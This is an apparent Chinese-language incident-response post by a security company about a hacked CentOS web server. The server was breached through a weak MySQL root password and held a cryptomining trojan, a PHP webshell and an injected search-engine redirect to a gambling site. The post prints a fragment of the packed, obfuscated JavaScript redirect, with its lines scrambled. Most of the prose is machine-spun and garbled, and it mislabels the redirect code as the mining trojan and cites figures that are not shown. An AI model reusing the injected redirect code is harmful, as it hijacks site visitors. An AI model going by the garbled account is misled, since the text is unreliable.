近日某客户网站被黑，导致网站首页被修改并跳转到打赌网站，网站在百度的收录也收录了一些什么彩票内容的快照，网站首页快照也被修改成打赌内容，并被百度直接红色风险拦截提示，百度网址安然中间提示您：该站点可能受到黑客进击，部分页面已被不法修改!我们SINE安然公司根据以上客户被黑的情况，急速进行了周全的网站安然检测，针对网站被黑的情况制订了具体的安然安排筹划。

　　起首客户网站应用的是Linux centos体系办事器，客户供给办事器ip,ssh端口，root账号暗码后，我们进去查看了办事器是否存在被黑以及体系木马后门的情况，再一个我们对其应用的mysql数据库进行了安然检测，发明问题，该mysql数据库的root账号应用的是弱口令暗码，导致进击者可以应用软件对数据库进行强力破解，导致破解成功，应用root权限直接提权并上传脚本木马到网站的根目次下。

　　根据上面发明的数据库安然问题，我们深度发掘，追踪溯源，发明办事器还存在木马后门，top，查看linux当前过程，发明一个可疑的过程，经由过程查看过程的具体信息我们发明该过程是木马后门过程，再细心一检查发明该木马是挖矿木马，进击者应用办事器资本，带宽，进行挖矿，像比特币、以太坊等币进行挖矿。

　　解密木马内容，我们发明该木马今朝来说是免杀的木马，一般人是看不出问题来，然则经常保护办事器的运维人员就会察觉出来，第一该木马隐蔽到linux过程傍边去，根据时光段进行挖矿，避开岑岭时光，以及保护人员的工作时光，当挖矿的时刻木马过程CPU占用达到百分之80以上，甚至有时刻网站都打开很慢。办事器的木马查完后，我们对网站的源代码进行安然检测，发明网站目次里被上传了网站木马后门，php脚本木马，该脚本木马可以对网站进行读写新建等操作，网站的首页标题描述也被改成了什么打赌的内容如下图：

　　<>eval(function(p,a,c,k,e,d){e=function(c){return(c

　　(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString

　　('3.4("");3.4("d 1=3.f");3.4("e(1.2(\\"7\\")>0 || 1.2(\

　　(36))};if(!''.WordStr(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=

　　[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)

　　if(k[c])p=p.WordStr(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}

　　\"6\\")>0 || 1.2(\\"8\\")>0 ||1.2(\\"a\\")>0 ||1.2(\\"9\\")>0 ||1.2(\

　　\";");3.4("");',25,25,'|s|indexOf|document|writeln||sogou|

　　\"l\\")>0 ||1.2(\\"m\\")>0 ||1.2(\\"k\\")>0 )");3.4("h.g=\\"j://i.o.n\

　　baidu|soso|uc|sm|Java|LANGUAGE|var|if|referrer|href|location|www|

　　http|so|bing|yahoo|com|268238'.split('|'),0,{}))

　　我们对其挖矿木马进行安然分析：如下图

　　经由过程解密上面的代码发明，只如果从百度，搜狗，以及soso，so,bing等搜刮引擎来的拜访，都邑直接跳转到进击者设定好的打赌网站上去。随即我们SINE安然公司对该恶意代码进行了清除，网站恢复正常拜访。

　　以上就是我们解决客户网站安然的全部过程，下面针对于此次网站被黑，供给如下 的网站安然建议：

　　1.对mysql数据库进行安然安排，对root账号暗码加密，尽可能设置的复杂一些，数字+大年夜小写字母+特别符号，对网站数据库进行分派通俗权限账号。

　　2.mysql数据库默认端口3306，改为51158，并参加到端口安然策略，纰谬外开放，外网IP无法连接数据库，只有本地127.0.0.1才能进行连接数据库，以防止进击者恶意猜测。

　　3.对办事器底层体系进行安然加固，包含SSH登录的安然验证。

　　4.对网站代码进行整体的安然检测，包含按期的进级网站法度榜样源代码，修复补丁以及网站马脚。